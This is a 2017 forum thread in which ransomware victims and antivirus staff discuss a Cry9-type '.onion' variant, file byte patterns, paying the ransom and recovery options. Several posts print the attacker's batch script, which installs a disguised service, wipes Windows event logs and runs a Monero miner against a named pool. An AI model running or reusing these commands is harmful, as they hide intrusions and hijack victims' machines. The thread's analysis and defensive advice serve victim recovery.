mclaugb 2 Posted May 9, 2017 Report Share Posted May 9, 2017 I have the exe's if you are interested. I'm not going to post them for everyone, but I'll send them to invididuals. 1 Quote Link to post Share on other sites
matwachich 3 Posted May 9, 2017 Report Share Posted May 9, 2017 3 minutes ago, mclaugb said: I have the exe's if you are interested. I'm not going to post them for everyone, but I'll send them to invididuals. I'm interested! Please upload them and PM me the links. Thanks! Do the emsisoft team have the exes? Quote Link to post Share on other sites
Sarah W 26 Posted May 9, 2017 Report Share Posted May 9, 2017 2 hours ago, ganymede said: I think this guy might have the actual executable. On a different note, I'm not sure why but I forgot to mention in my original post that I found the service registry of the virus in my Windows logs: winlogon.exe -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 48Nk7Q5oB5gEVLabrgo3KhLbaTSDKvZNHBECoHyZcxWNDMgfDnHA8Ue2Skp7A6z2ZGG93wmLxxrKa1j4QR7kmi866AP1G8t -p x Workstationt C:\Windows Maybe that long nonsense string has something to do with the key? That's a cryptocoin miner. The criminals running this campaign drop these miners, which take up system resources and power in order to mine these coins for them, so it's not something you want on your system. Emsisoft Anti-Malware should be able to detect such threats, and if our product is of help then please consider buying it (the price is discounted and we protect against ransomware such as this one). Some other advice is that investing in a good backup procedure is very important and well worth it. I would suggest having two or more backups, at least one disconnected. You will also need to secure RDP with a strong password if you continue to use RDP, as this is how the criminals enter the system. We are still looking into this to see if there is anything we can do to help you decrypt. Regards, Sarah Quote Link to post Share on other sites
GraphX 0 Posted May 9, 2017 Report Share Posted May 9, 2017 I very hope for your help, the same 36bytes difference as in all previous posts here and .onion extension. Seems like a big deal... Quote Link to post Share on other sites
mclaugb 2 Posted May 10, 2017 Report Share Posted May 10, 2017 Here is the windows script mine was running run.bat echo Havefun C:\Windows\dell\svchost.exe install "Windows32_Update" "C:\Windows\dell\run64.bat" C:\Windows\dell\svchost.exe start Windows32_Update wevtutil cl "windows powershell" wevtutil cl "security" wevtutil cl "system" echo Havefun run64.bat Update64 -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 45EngfR9yFHGSGLXMSVh88XuErCN95qQYirYNm4pVaJDakxthy3KWPP2hgDBVaAwcBafup6sefXML3CTYXmZfSJLUfHQQXW -p x -dbg -1 Then repeated calls to the svchost.exe Quote Link to post Share on other sites
GeorgeB 3 Posted May 10, 2017 Report Share Posted May 10, 2017 9 hours ago, ganymede said: I think this guy might have the actual executable. On a different note, I'm not sure why but I forgot to mention in my original post that I found the service registry of the virus in my Windows logs: winlogon.exe -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 48Nk7Q5oB5gEVLabrgo3KhLbaTSDKvZNHBECoHyZcxWNDMgfDnHA8Ue2Skp7A6z2ZGG93wmLxxrKa1j4QR7kmi866AP1G8t -p x Workstationt C:\Windows Maybe that long nonsense string has something to do with the key? What is last 35 bytes at the end of encrypted files (in my case is 31 of 00 and EF 52 5E A0)? Quote Link to post Share on other sites
ganymede 3 Posted May 10, 2017 Report Share Posted May 10, 2017 On 5/8/2017 at 7:14 AM, ganymede said: My last 4 in each file are 35 F6 5C 01. Quote Link to post Share on other sites
mclaugb 2 Posted May 11, 2017 Report Share Posted May 11, 2017 I finally gave in to the scam as our business did not have a backup and had some time sensitive materials. EMISOFT--it would be nice if you could communicate with people in the forum a little more frequently and indicate a timeline, how we can help, etc. I find it a little frustrating that few if any of your team are even on these forums. Maybe we're too incapable of helping you but some updating would be nice. Anyway, I saved all of the de-crypt exe files locally that the criminals gave me, my user number (number in all the filenames), and a >256 character keystring that the hacker website provided me. The ransom allows you to download the decrypter exe for three different filetype extensions. Mine are a bolal4nd.onion type so i used that exe. The hardest thing was actually buying bitcoins and getting that done reasonably quickly. I went to a bitcoin ATM and put in cash and set up a bitcoin wallet on Coinbase. Cost about $275 bucks all in all, but i had put 20 hours into this, a new hard drive, etc. For the record, the criminals tool did not initially decrypt the files correctly--it failed giving an error. But there is a little checkbox "ignore checksum" that when clicked it says "may ruin the files". I made a copy of some files I needed and pointed the decrypter at this "folder" to test whether it would damage the files. The files opened near perfectly (some minor property information was lost) but It worked just fine and i have my files back. Now i have it running on the whole hard drive. The criminals also have a support box for you to send them files and your email address if the decrypt does not work for you. I'm not advocating for the path that we chose, but the good guys at EMSISOFT could do more to communicate more frequently to allow users to help them. I now have the VIRUS exe files, unencrypted files, encrypted files, the exe decrypting engine, and at least one key for the engine. EMSISOFT--SEND ME A MESSAGE IF YOU ARE INTERESTED. 1 Quote Link to post Share on other sites
matwachich 3 Posted May 11, 2017 Report Share Posted May 11, 2017 I am interested! Quote Link to post Share on other sites
ganymede 3 Posted May 11, 2017 Report Share Posted May 11, 2017 Just an opinion here, but the folks at Emsisoft are doing what they can to provide a FREE service to restore peoples' files, and for that no one has any reasonable ground on which to complain. I too have wondered as to their status, but with updates like Sarah's, I know that it's not being ignored. How much could they possibly share on a topic that most would likely not understand? For my own situation, I have reached out to a specialist recovery service, and they claim to be able to restore my files for ~2000$, but I am waiting for the folks at Emsisoft because I'm confident they'll come up with something in a reasonable amount of time. And also because no matter the cost to my company, I refuse to negotiate with terrorists. Meanwhile I have been redoing lost work as needed. All in all, still probably less cost than the $2k being quoted. If Fabian and the rest of Emsisoft's brain trust can fix this, you better believe I'm buying their product! 1 Quote Link to post Share on other sites
bruticus0 3 Posted May 11, 2017 Report Share Posted May 11, 2017 Dude. Take your business and complain to Kapersky, Norton, or Bitdefender. See how many replies you get there about their decryptors. Timeline? All of us...every single one is here just for the "chance" that we might be able to get our files back. Everyone on this thread is looking for a handout. We haven't had to provide an Emsisoft license key, or sign up for anything to access any of the decryptors they have come out with. Your files are lost and there's one guy. ONE guy in this whole world that's actually trying to help you out. And you want a timeline? 1. You left your computers at risk in the first place. 2. You wasn't even running the anti malware they sell to make a living that would have prevented the infection. 3. Now you want them to contact you, instead of you just uploading the files offsite or bleeping computer, then emailing emsisoft with the links? Guys, we're only mooching off their good graces here. RANT OVER Thanks for the update Sarah, we appreciate it. 1 Quote Link to post Share on other sites
mclaugb 2 Posted May 11, 2017 Report Share Posted May 11, 2017 Dear all, I couldn't agree more with your comments about not really having the right to complain. I have complained to the other companies as well, namely McAfee as their product totally failed and was disabled by this tool all together. Sarah posting her note was encouraging, but it was the first indication at all on the forums that there was any hope. I guess I was a little surprised that nobody from the company reached out to ask for any of the executables, file logs, Etc. I guess I inferred from that that either they didn't care, we're not working on it, or already had them and did not need them. So Sarah's note saying they were working on it was definitely encouraging! Lots of companies make free Tools in order to get their brand and their name out such that their products will be purchased. I for example am considering buying site licenses for emsi soft products. So "free" tools do ultimately tie into a business model. Good for emsisoft. Again if anyone wants encrypted files decrypted, keys, decrypting engine --do let me know if I can benefit the community through the ransom I paid. Thank you emsisoft again for your efforts. Bryan Quote Link to post Share on other sites
CKWS 1 Posted May 11, 2017 Report Share Posted May 11, 2017 Hi Brian and the rest of victims out there! Have had some time today and took a look at the "unlock.exe" file (namely the one from here: https://www.dropbox.com/s/rdiqwrp4zarrfzd/unlock_gebdp3k7bolalnd4.onion.zip?dl=0 ) with a Debugger (Ollydbg) and a Decompiler (IDR, kb2014 knowledge base). I'm not THAT skilled with such things but I think I found two hints that maybe can be used by professionals to maybe speed up things a little. First one: Address of the "Unlock One" Button Click Event: 5CBD64 Second one: Private Key may be "BqdmQNCK1v8acZ12" Would be great if someone would be able to check what happens at this Click Event and maybe sees how the encrypt/decrypt routine actually works. Quote Link to post Share on other sites
Sarah W 26 Posted May 11, 2017 Report Share Posted May 11, 2017 20 hours ago, mclaugb said: I finally gave in to the scam as our business did not have a backup and had some time sensitive materials. EMISOFT--it would be nice if you could communicate with people in the forum a little more frequently and indicate a timeline, how we can help, etc. I find it a little frustrating that few if any of your team are even on these forums. Maybe we're too incapable of helping you but some updating would be nice. Anyway, I saved all of the de-crypt exe files locally that the criminals gave me, my user number (number in all the filenames), and a >256 character keystring that the hacker website provided me. The ransom allows you to download the decrypter exe for three different filetype extensions. Mine are a bolal4nd.onion type so i used that exe. The hardest thing was actually buying bitcoins and getting that done reasonably quickly. I went to a bitcoin ATM and put in cash and set up a bitcoin wallet on Coinbase. Cost about $275 bucks all in all, but i had put 20 hours into this, a new hard drive, etc. For the record, the criminals tool did not initially decrypt the files correctly--it failed giving an error. But there is a little checkbox "ignore checksum" that when clicked it says "may ruin the files". I made a copy of some files I needed and pointed the decrypter at this "folder" to test whether it would damage the files. The files opened near perfectly (some minor property information was lost) but It worked just fine and i have my files back. Now i have it running on the whole hard drive. The criminals also have a support box for you to send them files and your email address if the decrypt does not work for you. I'm not advocating for the path that we chose, but the good guys at EMSISOFT could do more to communicate more frequently to allow users to help them. I now have the VIRUS exe files, unencrypted files, encrypted files, the exe decrypting engine, and at least one key for the engine. EMSISOFT--SEND ME A MESSAGE IF YOU ARE INTERESTED. 14 A few things. First of all, we are a 30 people team, hardly the scale of most antivirus vendors with 500+ employees. This means that many of us have to work multiple roles and we offer the decrypters for free, meaning that we don't directly profit from them (however, we appreciate anyone who considers our products based on them), so they have to be balanced around the other work we have to do. Giving a timeline would not be a good idea, we rarely know how long it will take. We would not like to give a set time and then fail to meet it because we came across a problem we didn't expect. In the end, we do understand if you have to pay the ransom, however, we try to warn against doing so as this is what makes ransomware profitable. We already have the malware file, so whilst you can upload the file to a post, it's not necessary to do so. I do admit communication could be better and more regular but in general, if we have something new we will update. I will try to update more now. I do have one suggestion whilst people are waiting, and that is using file/data recovery tools. I don't know how effective this will be but may provide some results for some people. Regards, Sarah 1 Quote Link to post Share on other sites
matwachich 3 Posted May 11, 2017 Report Share Posted May 11, 2017 I'm currently working on pictures recovery. The technique already worked for me. I'm developping a tool to apply it on many files at once. So if you gonna pay only for pics, wait a moment. PM me if you want more info. Quote Link to post Share on other sites
Win32.DN 0 Posted May 12, 2017 Report Share Posted May 12, 2017 My friend became the victim and I reversed uploaded "unlock.exe" yesterday. The 36 (0x24) bytes variant is actually based on Cry9. I already understand (i hope) how the unlocker decrypts the files. The problem is factoring the AES128 key (and 0x1000+ bytes additional table), which looks to be different per the victim. Maybe Fabian knows better about this part (or he is stuck at the same point). I will look more when I have more time but don't expect good news from me. Quote Link to post Share on other sites
GeorgeB 3 Posted May 12, 2017 Report Share Posted May 12, 2017 On 5/11/2017 at 4:13 AM, mclaugb said: I finally gave in to the scam as our business did not have a backup and had some time sensitive materials. EMISOFT--it would be nice if you could communicate with people in the forum a little more frequently and indicate a timeline, how we can help, etc. I find it a little frustrating that few if any of your team are even on these forums. Maybe we're too incapable of helping you but some updating would be nice. Anyway, I saved all of the de-crypt exe files locally that the criminals gave me, my user number (number in all the filenames), and a >256 character keystring that the hacker website provided me. The ransom allows you to download the decrypter exe for three different filetype extensions. Mine are a bolal4nd.onion type so i used that exe. The hardest thing was actually buying bitcoins and getting that done reasonably quickly. I went to a bitcoin ATM and put in cash and set up a bitcoin wallet on Coinbase. Cost about $275 bucks all in all, but i had put 20 hours into this, a new hard drive, etc. For the record, the criminals tool did not initially decrypt the files correctly--it failed giving an error. But there is a little checkbox "ignore checksum" that when clicked it says "may ruin the files". I made a copy of some files I needed and pointed the decrypter at this "folder" to test whether it would damage the files. The files opened near perfectly (some minor property information was lost) but It worked just fine and i have my files back. Now i have it running on the whole hard drive. The criminals also have a support box for you to send them files and your email address if the decrypt does not work for you. I'm not advocating for the path that we chose, but the good guys at EMSISOFT could do more to communicate more frequently to allow users to help them. I now have the VIRUS exe files, unencrypted files, encrypted files, the exe decrypting engine, and at least one key for the engine. EMSISOFT--SEND ME A MESSAGE IF YOU ARE INTERESTED. Dear Mclaugb, Please share unlocker ,key provided and sample of encrypted files. I want to try to dissasembly unlocker. Thanks! Quote Link to post Share on other sites
GeorgeB 3 Posted May 12, 2017 Report Share Posted May 12, 2017 9 hours ago, Win32.DN said: My friend became the victim and I reversed uploaded "unlock.exe" yesterday. The 36 (0x24) bytes variant is actually based on Cry9. I already understand (i hope) how the unlocker decrypts the files. The problem is factoring the AES128 key (and 0x1000+ bytes additional table), which looks to be different per the victim. Maybe Fabian knows better about this part (or he is stuck at the same point). I will look more when I have more time but don't expect good news from me. Nice work, Let's name this variant CRY36, Please confirm that this variant crypt files in 32 byte block and only first 320 blocks of 32 bytes(10k). Please share any knowledge about how this variant works. Thanks Quote Link to post Share on other sites
Cookie 0 Posted May 12, 2017 Report Share Posted May 12, 2017 Hello to all, I had infected my computer on 10 May 2017. The whole files was encrypted by filename.extension.xxxxxx.id_xxxxxx_fgb45ft3pqamyji7.onion. The ID Ransomware site identificate as CRY9 I had also test the decryptor from emsisoft but it says the fille must be 68bytes diffeerent. My example file is about 20MB and the different to crypted is 61bytes. Maybe i do something wrong - or it is not a CRY9? I have a backup but it's from several months ago. I don't now what to do now... Thank's for help and good Job in fight with hakers. Quote Link to post Share on other sites
bruticus0 3 Posted May 12, 2017 Report Share Posted May 12, 2017 9 hours ago, Cookie said: Hello to all, I had infected my computer on 10 May 2017. The whole files was encrypted by filename.extension.xxxxxx.id_xxxxxx_fgb45ft3pqamyji7.onion. The ID Ransomware site identificate as CRY9 I had also test the decryptor from emsisoft but it says the fille must be 68bytes diffeerent. My example file is about 20MB and the different to crypted is 61bytes. Maybe i do something wrong - or it is not a CRY9? I have a backup but it's from several months ago. I don't now what to do now... Thank's for help and good Job in fight with hakers. 9 The last decryptor for Cry that Emsi made is here . I think it runs for most of us, it just doesn't find the key file. So far, our files have had a 36 byte difference. Like they said above, 32 bytes at the beginning of the file, then 4 bytes at the end I think. Best thing to do is get rid quarantine the infection if you can first. (If you have the executable infection quarantined, you can then upload it). Emsisoft has an Emergency Kit somewhere around here that does really well. Then you can backup the encrypted files somewhere and get your C drive back to operating normally. Then plug up any security holes in remote desktop, update your windows, and get a good anti malware installed. There's a few free anti ransomware programs you can tack on in addition to antivirus/malware. Malwarebytes makes one and I think Cybereason does too. Bitdefender has one, but I think it's hard to find. And disable or secure your Remote Desktop and Remote Assistance Connections. You can upload a file pair here if you want. Wouldn't hurt. A file pair is an original file and its encrypted counterpart. You should be able to find an original somewhere. Program readmes are usually the same. And .exe files of the same version can be downloaded again. Then just check back here for any new updates. If they release a new decryptor anytime in the future, you'll have your backed up files to use it with. Quote Link to post Share on other sites
Cookie 0 Posted May 12, 2017 Report Share Posted May 12, 2017 11 hours ago, bruticus0 said: The last decryptor for Cry that Emsi made is here . I think it runs for most of us, it just doesn't find the key file. So far, our files have had a 36 byte difference. Like they said above, 32 bytes at the beginning of the file, then 4 bytes at the end I think. Best thing to do is get rid of the infection if you can first. Emsisoft has an Emergency Kit somewhere around here that does really well. Then you can backup the encrypted files somewhere and get your C drive back to operating normally. Then plug up any security holes in remote desktop, update your windows, and get a good anti malware installed. There's a few free anti ransomware programs you can tack on in addition to antivirus/malware. Malwarebytes makes one and I think Cybereason does too. Bitdefender has one, but I think it's hard to find. And disable or secure your Remote Desktop and Remote Assistance Connections. You can upload a file pair here if you want. Wouldn't hurt. A file pair is an original file and its encrypted counterpart. You should be able to find an original somewhere. Program readmes are usually the same. And .exe files of the same version can be downloaded again. Then just check back here for any new updates. If they release a new decryptor anytime in the future, you'll have your backed up files to use it with. Thank You for Your answer, i had an old copy of some files. But the diference between orginal and infected of my files is about 61bytes. It is not 68bytes and not 36bytes also I don't now where is the problem... Maybe it is another ransom? Quote Link to post Share on other sites
matwachich 3 Posted May 12, 2017 Report Share Posted May 12, 2017 Yes, it must be another variant... Try this to know which ransomware it is. By the way, the 36 bytes are all appended at the end of the file. In all my files, it is: [1 randome byte][31 null bytes][4 fixed bytes) Quote Link to post Share on other sites
bruticus0 3 Posted May 12, 2017 Report Share Posted May 12, 2017 I was actually wrong above. Should try to quarantine the infection. If they have the .exe, they can try to make a decryptor a little easier. So if you do have a new variant of this, that exe would prolly be important in the process. Sorry Good job in figuring that out matwa. Maybe that one random byte has something to do with the encryption of the file. With everyone's info, we know a lot more than we did a week or two ago. Also, just in case you didn't know. These acts are cyber crimes/terrorism, whatever you wanna call it. You can report it to the authorities. In the US you can file a complaint with the IC3 here . The more people that report, the more it'll draw attention to the issue and let'em try and do something about it. Quote Link to post Share on other sites
matwachich 3 Posted May 13, 2017 Report Share Posted May 13, 2017 The c:\windows\dell\svchost.exe is only this I don't have (yet) the real virus executable. Anyone can provide it? Quote Link to post Share on other sites
matwachich 3 Posted May 14, 2017 Report Share Posted May 14, 2017 I have just discovered a terrible thing!!! Some files are entirely encrypted!!!!! Quote Link to post Share on other sites
mclaugb 2 Posted May 14, 2017 Report Share Posted May 14, 2017 Did you get the 15321.exe file and the two batch files? The svchost.exe was being called by that batch file every 2 minutes in my firewall logs once the virus hit. I'm going to upload a packet of files the decryptor, pre decrypted files, and post decrypted files tomorrow. They are mostly ascii files so they are very easy to read with a hex editor. Maybe having one solution to the encryption will help folks generate a decryptor. There is a 4 digit number the ransomware generates when you login to pay. That likely is used in the unlock key. Quote Link to post Share on other sites
Reynald0 0 Posted May 15, 2017 Report Share Posted May 15, 2017 Hi guys, i have the same problem. Looks like this topic has good information... Please if someone can share the tool to decrypt files. If it can help, there is a simple of my files. (original and encrypted) SAMPLE.zip Quote Link to post Share on other sites
AL3918 0 Posted May 15, 2017 Report Share Posted May 15, 2017 I am a drafter in California. My computer was infected with the Cry9 *.onion encryption. I went on every forum...researching for days if anyone had any solutions...and was lead here and have seen other people have complained about a similar *.onion encryption. This forum helped me to reboot to safe mode so I could run an antimalware sweep. Thank you Emsisoft. I am just a regular person....computer drafter who's cad files had all been encrypted with the onion encryption. Thousands of drafting hours potentially lost. I am no computer programmer or IT expert. This forum was very informative at least helping me understand the nature and severity of this nasty encryption. Over the years I've dealt with different kids of malware.....Trojan Vundo with the biohazard icon on the desktop, that one virus that converted my files to hidden types, ect. Typically I could jump on a forum and within a couple hours research .....someone had a solution. This cry9 variant truly caused severe stress to my life, my coworkers, and our families. I want to share how I was able to recover all my files ....all 222 GB of it. I hired a company called proven data recovery. It took about 4 days for them to decrypt the files. I was unsure at first since one data recovery company told me it was going to cost $20k to decrypt. I called a couple others......by chance found proven data recovery and their fee was much more reasonable. So for those who have files encrypted with the *.onion cry9, proven data recovery helped me. Maybe there is another way to deal directly with the terrorists but my company did not feel comfortable doing that and possibly giving money via bitcoin with no proven return our files would be decrypted. This whole ordeal has taught me a couple things.....get a cloud backup and backup data at least every week to an external hardrive...... keep the operating software/updates up-to-date. Quote Link to post Share on other sites
bruticus0 3 Posted May 15, 2017 Report Share Posted May 15, 2017 Thanks for the input Al, we appreciate it. Even if it costs some money, having another option open to recover your files is a good thing. On the subject of backups, I've found I kind of like the idea behind Macrium Reflect. It's expensive for the paid version, but the free version does what you need too without any bells and whistles. There's a two step thing. First you can make a backup that is a image of the drive itself. The image file is also compressed which saves you some space. You can do one time backups with free version, then put that backup on an external device you keep offline, or upload it yourself to the cloud somewhere. The second step you do is under "Other Tasks". It's called a "Rescue Media". What this does is put Windows Pocket Edition (PE), along with Macrium onto a bootable usb or CD. This can be stored offline as well. So to restore from a backup, take the usb, load it up, and it will start a Windows PE session on your computer. Then get your backup image from the cloud or wherever you kept it. Plug it in and direct Macrium to look there and you can choose that image. It will then start to restore your backup. It's a really simple process to do. I did a restore on my new OS install and everything went ok except for one or two Asus drivers. They didn't really like being restored that way. Other than that, it's a very easy backup plan I think. If you have the paid version of it, you can do backup schedules. Grandfather, Incremental, Differential, and a Full Synthetic type backup. Quote Link to post Share on other sites
Geng 0 Posted May 15, 2017 Report Share Posted May 15, 2017 @AL3918 Thanks for letting us know. Can you let us know how the data recovery process went? Did you have to send ALL 222GB of your files to them? Or did they send you a decrypter? Quote Link to post Share on other sites
kygiacomo 2 Posted May 16, 2017 Report Share Posted May 16, 2017 On 5/10/2017 at 9:13 PM, mclaugb said: I finally gave in to the scam as our business did not have a backup and had some time sensitive materials. EMISOFT--it would be nice if you could communicate with people in the forum a little more frequently and indicate a timeline, how we can help, etc. I find it a little frustrating that few if any of your team are even on these forums. Maybe we're too incapable of helping you but some updating would be nice. Anyway, I saved all of the de-crypt exe files locally that the criminals gave me, my user number (number in all the filenames), and a >256 character keystring that the hacker website provided me. The ransom allows you to download the decrypter exe for three different filetype extensions. Mine are a bolal4nd.onion type so i used that exe. The hardest thing was actually buying bitcoins and getting that done reasonably quickly. I went to a bitcoin ATM and put in cash and set up a bitcoin wallet on Coinbase. Cost about $275 bucks all in all, but i had put 20 hours into this, a new hard drive, etc. For the record, the criminals tool did not initially decrypt the files correctly--it failed giving an error. But there is a little checkbox "ignore checksum" that when clicked it says "may ruin the files". I made a copy of some files I needed and pointed the decrypter at this "folder" to test whether it would damage the files. The files opened near perfectly (some minor property information was lost) but It worked just fine and i have my files back. Now i have it running on the whole hard drive. The criminals also have a support box for you to send them files and your email address if the decrypt does not work for you. I'm not advocating for the path that we chose, but the good guys at EMSISOFT could do more to communicate more frequently to allow users to help them. I now have the VIRUS exe files, unencrypted files, encrypted files, the exe decrypting engine, and at least one key for the engine. EMSISOFT--SEND ME A MESSAGE IF YOU ARE INTERESTED. so ur mad at emsi for your own mistake? i find that a little odd to say the least. people like you are what keeps these terrorists in business. i have Emsisoft internet secuirty and i can honestly say that i have never had a virus,malware or ransomware. Quote Link to post Share on other sites
ganymede 3 Posted May 16, 2017 Report Share Posted May 16, 2017 4 hours ago, AL3918 said: I want to share how I was able to recover all my files ....all 222 GB of it. I hired a company called proven data recovery. It took about 4 days for them to decrypt the files. I was unsure at first since one data recovery company told me it was going to cost $20k to decrypt. I called a couple others......by chance found proven data recovery and their fee was much more reasonable. So for those who have files encrypted with the *.onion cry9, proven data recovery helped me. Maybe there is another way to deal directly with the terrorists but my company did not feel comfortable doing that and possibly giving money via bitcoin with no proven return our files would be decrypted. Ahh this was the company I reached out to as well. They quoted me ~$1900 for 5-7 day service. I opted not to pursue in the hopes that Emsi will come out with something in the near future, but if I need the data sooner, it's good to know now that they're a sure thing. Thanks for the info. Quote Link to post Share on other sites
kygiacomo 2 Posted May 16, 2017 Report Share Posted May 16, 2017 how did u guys get the infection in the first place? did u click a link in a email? Quote Link to post Share on other sites
Kevin Zoll 309 Posted May 16, 2017 Report Share Posted May 16, 2017 Any decrypter and encryption key given to one user will not work for another user. Encryption keys are system specific. Quote Link to post Share on other sites
ganymede 3 Posted May 16, 2017 Report Share Posted May 16, 2017 Most commonly it's been brute force entry via Remote Desktop, though I've been hearing in the news lately that Office 365 and some other feature Windows comes with were also points of entry. I can't remember the name of the other thing off the top of my head but apparently it was a serious enough vulnerability that Microsoft released updates for old OSes as far back as XP. Quote Link to post Share on other sites
Kevin Zoll 309 Posted May 16, 2017 Report Share Posted May 16, 2017 WannaCry exploits an unpatched vulnerability in the SMBv1 protocol on unpatched Windows systems. If your system is up to date then it is not vulnerable. MS has released a patch for Win XP, Server 2003, and Win 8 to patch SMBv1 on those no longer supported operating systems. Quote Link to post Share on other sites
mclaugb 2 Posted May 16, 2017 Report Share Posted May 16, 2017 Hi Folks, I'm not sure if these files will help, but I've posted all of the virus files, ID, decryption key (provided by the scammers), etc. I'm hopeful that this will help those with the expertise to save others time and money. But it was a horrible experience with CRY128 which i hope will guide others in how the scam can be cracked. I had no backup and was in a time pinch at our company, so I could not wait it out for a crack. I also use R-soft tools for recovery and found some files, but unfortunately R-soft cannot recognize common engineering formatted files so it couldn't find those. First I found the virus files reaking havoc by looking at Endpoint Security logs and windows System / App logs. The smoking gun appeared to be pointed at a c:\windows\dell folder containing some batch files. Also a file 15321.exe kept appearing in my c:\ directory (All of these files are zipped in folder VIRUS_FILES). I password protected the ZIP file with the word "infected" so that no accidents happen. In a pinch, I had to pay the ransom. Using the Tor browser, the Ransom page asks you to enter your FILE ID. In my case, all files were named "*1638578921*.onion You can play with the attached encrypted files and the decryptor. The TOR Browser pulls up a "Decrypt panel" THe ID KEY must be typed in: (in my case 1638578921) There is then a "Show code" box which currently displays "35352" with a blank box. You must re-enter the code in that box. (Presumably this is used in some way to generate the key). You then press enter and it provides you with an address to send the bitcoins to. Note, the number was the same when I visited the webpage multiple times within a 24 hour period, but I think it has changed. Once paid, it provides you three files to download. (I have attached all three versions in the zip file). I have attached the instruction page (after you pay) and the "decrypt" password for all of the decryption software. Your ID: 1638578921 PRIVATE KEY: 313633383537383932315FB78EB17DCE9907B7E60F97A278A391F8497C82918C9523B80364249F1E9290C75FD2B0817449A77D8D32097A9DB94FB0BF5F652D94F73902A514DDD91E683E415FF26D19F0A860C8D743DEBB73E5AAC703D35F805065EEB1111EE828D301637FEA7EB90B5DB744E04B20026440BB398CD9169EDF7237CDFAB4611FE9563922D151A757A151B5E1D046FC4A53379B9859D9B5598082E84A7F6651CC805FE562AE8973AEA8845CF2DC25E8E409DBE7434F31C1B0B5FD5CA3EA60736DA77A2CAA1C8C17AC23EEECA445FBAB95B2F5E668C5729DB6DBB4738E10508C802BED5742064CD3F902ED75E7151033E2419F1037E283AB9F835AA25C1975C98FE3D5966D545039FA9C2B3A4FEAE1A6906BDA11417C34F96ECEF86FEC5173DBBA10526D0F8BE586D616B01CA030F6EF16182C1AA6EB493F0612836D7CC2DD8B510C93B1BA7454FA2539D296ACC6272431DDE2AB50940BBE2F00 The decryptor does not work as you will see without checking "ignore checksum" box. Then it decrypts the files just fine. Anyway, I hope this helps. Bryan CRY128_FILES_UNLOCK.zip README.TXT.txt Quote Link to post Share on other sites
MARIO RENNO 0 Posted May 16, 2017 Report Share Posted May 16, 2017 Nao consigo baixar os arquivos Bryan. Poderia me enviar no email [email protected]? Quote Link to post Share on other sites
Geng 0 Posted May 16, 2017 Report Share Posted May 16, 2017 @mclaugb Did you check if the decrypter .exe files contained any viruses? Many people reported they do. Quote Link to post Share on other sites
Win32.DN 0 Posted May 16, 2017 Report Share Posted May 16, 2017 Unfortunately, legit decryptor does not help the difficult part. The difficult thing is factoring the "PRIVATEKEY" which is different per users. Quote Link to post Share on other sites
CKWS 1 Posted May 16, 2017 Report Share Posted May 16, 2017 vor 10 Stunden schrieb AL3918: I want to share how I was able to recover all my files ....all 222 GB of it. I hired a company called proven data recovery. It took about 4 days for them to decrypt the files. I was unsure at first since one data recovery company told me it was going to cost $20k to decrypt. I called a couple others......by chance found proven data recovery and their fee was much more reasonable. So for those who have files encrypted with the *.onion cry9, proven data recovery helped me. Maybe there is another way to deal directly with the terrorists but my company did not feel comfortable doing that and possibly giving money via bitcoin with no proven return our files would be decrypted. Would be interesting how this company did it. Do they have a decrypter or do they just pay the ransom (which is less than what they receive from you) and keep the rest? If they have a working decrypter it would be worth considering their service. If they only act as "man in the middle" and criminals still get paid it is worthless. Quote Link to post Share on other sites
GeorgeB 3 Posted May 16, 2017 Report Share Posted May 16, 2017 7 hours ago, mclaugb said: Hi Folks, I'm not sure if these files will help, but I've posted all of the virus files, ID, decryption key (provided by the scammers), etc. I'm hopeful that this will help those with the expertise to save others time and money. But it was a horrible experience with CRY128 which i hope will guide others in how the scam can be cracked. I had no backup and was in a time pinch at our company, so I could not wait it out for a crack. I also use R-soft tools for recovery and found some files, but unfortunately R-soft cannot recognize common engineering formatted files so it couldn't find those. First I found the virus files reaking havoc by looking at Endpoint Security logs and windows System / App logs. The smoking gun appeared to be pointed at a c:\windows\dell folder containing some batch files. Also a file 15321.exe kept appearing in my c:\ directory (All of these files are zipped in folder VIRUS_FILES). I password protected the ZIP file with the word "infected" so that no accidents happen. In a pinch, I had to pay the ransom. Using the Tor browser, the Ransom page asks you to enter your FILE ID. In my case, all files were named "*1638578921*.onion You can play with the attached encrypted files and the decryptor. The TOR Browser pulls up a "Decrypt panel" THe ID KEY must be typed in: (in my case 1638578921) There is then a "Show code" box which currently displays "35352" with a blank box. You must re-enter the code in that box. (Presumably this is used in some way to generate the key). You then press enter and it provides you with an address to send the bitcoins to. Note, the number was the same when I visited the webpage multiple times within a 24 hour period, but I think it has changed. Once paid, it provides you three files to download. (I have attached all three versions in the zip file). I have attached the instruction page (after you pay) and the "decrypt" password for all of the decryption software. Your ID: 1638578921 PRIVATE KEY: 313633383537383932315FB78EB17DCE9907B7E60F97A278A391F8497C82918C9523B80364249F1E9290C75FD2B0817449A77D8D32097A9DB94FB0BF5F652D94F73902A514DDD91E683E415FF26D19F0A860C8D743DEBB73E5AAC703D35F805065EEB1111EE828D301637FEA7EB90B5DB744E04B20026440BB398CD9169EDF7237CDFAB4611FE9563922D151A757A151B5E1D046FC4A53379B9859D9B5598082E84A7F6651CC805FE562AE8973AEA8845CF2DC25E8E409DBE7434F31C1B0B5FD5CA3EA60736DA77A2CAA1C8C17AC23EEECA445FBAB95B2F5E668C5729DB6DBB4738E10508C802BED5742064CD3F902ED75E7151033E2419F1037E283AB9F835AA25C1975C98FE3D5966D545039FA9C2B3A4FEAE1A6906BDA11417C34F96ECEF86FEC5173DBBA10526D0F8BE586D616B01CA030F6EF16182C1AA6EB493F0612836D7CC2DD8B510C93B1BA7454FA2539D296ACC6272431DDE2AB50940BBE2F00 The decryptor does not work as you will see without checking "ignore checksum" box. Then it decrypts the files just fine. Anyway, I hope this helps. Bryan CRY128_FILES_UNLOCK.zip README.TXT.txt Please send these files. I cannot download from original post. Thanks. 1 Quote Link to post Share on other sites
Nova 2 Posted May 16, 2017 Report Share Posted May 16, 2017 Hi all Is there anyone got cry36 can solved ? The encrypted file name is fgb45ft3pqamyji7.onion Thanks. Quote Link to post Share on other sites
bruticus0 3 Posted May 16, 2017 Report Share Posted May 16, 2017 16 minutes ago, Nova said: Hi all Is there anyone got cry36 can solved ? The encrypted file name is fgb45ft3pqamyji7.onion Thanks. No, not yet Nova. You will probably see it here when they do though. Quote Link to post Share on other sites
